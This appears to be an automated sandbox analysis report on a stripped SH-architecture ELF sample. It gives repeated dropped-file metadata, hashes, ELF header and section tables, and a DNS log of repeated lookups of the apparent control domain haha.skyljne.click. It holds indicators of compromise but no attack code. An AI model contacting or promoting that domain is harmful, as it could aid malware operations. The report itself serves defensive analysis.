                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  Process:/tmp/pBVFNv9jh6.elf
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20
                                                  Entropy (8bit):4.1219280948873624
                                                  Encrypted:false
                                                  SSDEEP:3:TgNzjraBLs5:TghaBw5
                                                  MD5:8AD90A71C79A0FE994BAC3CA27A33A6E
                                                  SHA1:420232301098734E6B2DFA2A91C638EEAEE20D84
                                                  SHA-256:ACA2967CAC99CE28753AFB9A13C57BDA74C07D0BEA814FCB6DAD71F22D8E1A02
                                                  SHA-512:91941615B01655286A89ED3517A64EE1ADAF74BA33FD2566BBC6E111CD2E7BFF901A70245468ACB8045675EDF31BAF987F9A45440B86F55A13B509A3B34CD32E
                                                  Malicious:false
                                                  Preview:/tmp/pBVFNv9jh6.elf.
                                                  File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                                                  Entropy (8bit):6.201524218221186
                                                  TrID:
                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                  File name:pBVFNv9jh6.elf
                                                  File size:133'952 bytes
                                                  MD5:d33deff293c518223d95060d1b65bb6e
                                                  SHA1:62995bb72649bbdbf9258184e95c0f9a9700e7a2
                                                  SHA256:8d5f5035c0de3d2fe423723bfc5e557d27fdbc5a7f9b481c7557e4cfa00c4d37
                                                  SHA512:80bef3f2572abee85eb78cb761cd3e3d0432ceb09602c677e5c156d9cb5cadb801afd6509fced92dfb77ae6f477438e53cfe5eed3d431215ce66ec1564f76672
                                                  SSDEEP:1536:taEFjL9GpAccmnvb1ANaeK71EwJCqKNdC1tjQLvu8m2Wp3/krZT7OgT:tXJG5K5wJkN+wve2WR/kd7pT
                                                  TLSH:59D35A73C8266F68C295D1B4B0709F7D2B63A69481475FBE29B7C2B54083C8DF905BB8
                                                  File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@.|...|.....................B...B.DI..X...........Q.td............................././"O.n........#.*@........#.*@,....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                                                  ELF header

                                                  Class:ELF32
                                                  Data:2's complement, little endian
                                                  Version:1 (current)
                                                  Machine:<unknown>
                                                  Version Number:0x1
                                                  Type:EXEC (Executable file)
                                                  OS/ABI:UNIX - System V
                                                  ABI Version:0
                                                  Entry Point Address:0x4001a0
                                                  Flags:0x9
                                                  ELF Header Size:52
                                                  Program Header Offset:52
                                                  Program Header Size:32
                                                  Number of Program Headers:3
                                                  Section Header Offset:133512
                                                  Section Header Size:40
                                                  Number of Section Headers:11
                                                  Header String Table Index:10
                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                  NULL0x00x00x00x00x0000
                                                  .initPROGBITS0x4000940x940x300x00x6AX004
                                                  .textPROGBITS0x4000e00xe00x184400x00x6AX0032
                                                  .finiPROGBITS0x4185200x185200x240x00x6AX004
                                                  .rodataPROGBITS0x4185440x185440x2d380x00x2A004
                                                  .ctorsPROGBITS0x42c0000x1c0000xc0x00x3WA004
                                                  .dtorsPROGBITS0x42c00c0x1c00c0x80x00x3WA004
                                                  .dataPROGBITS0x42c0200x1c0200x49100x00x3WA0032
                                                  .gotPROGBITS0x4309300x209300x140x40x3WA004
                                                  .bssNOBITS0x4309440x209440x46140x00x3WA004
                                                  .shstrtabSTRTAB0x00x209440x430x00x0001
                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                  LOAD0x00x4000000x4000000x1b27c0x1b27c6.91650x5R E0x10000.init .text .fini .rodata
                                                  LOAD0x1c0000x42c0000x42c0000x49440x8f580.41790x6RW 0x10000.ctors .dtors .data .got .bss
                                                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 19, 2024 18:23:01.408910990 CET192.168.2.138.8.8.80xfbc5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:06.171443939 CET192.168.2.138.8.8.80x29c4Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:08.942725897 CET192.168.2.138.8.8.80xf5a0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:16.711236954 CET192.168.2.138.8.8.80x7b1cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:22.470531940 CET192.168.2.138.8.8.80xc141Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:33.238796949 CET192.168.2.138.8.8.80x9a99Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:42.010185003 CET192.168.2.138.8.8.80xe2eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:43.770524025 CET192.168.2.138.8.8.80x5fafStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:23:51.531477928 CET192.168.2.138.8.8.80xd30eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:00.293872118 CET192.168.2.138.8.8.80x7a35Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:11.052829027 CET192.168.2.138.8.8.80xdb8fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:19.815536976 CET192.168.2.138.8.8.80x7fc4Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:28.577919006 CET192.168.2.138.8.8.80x415eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                  Jan 19, 2024 18:24:31.739164114 CET192.168.2.138.8.8.80xb8e6Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
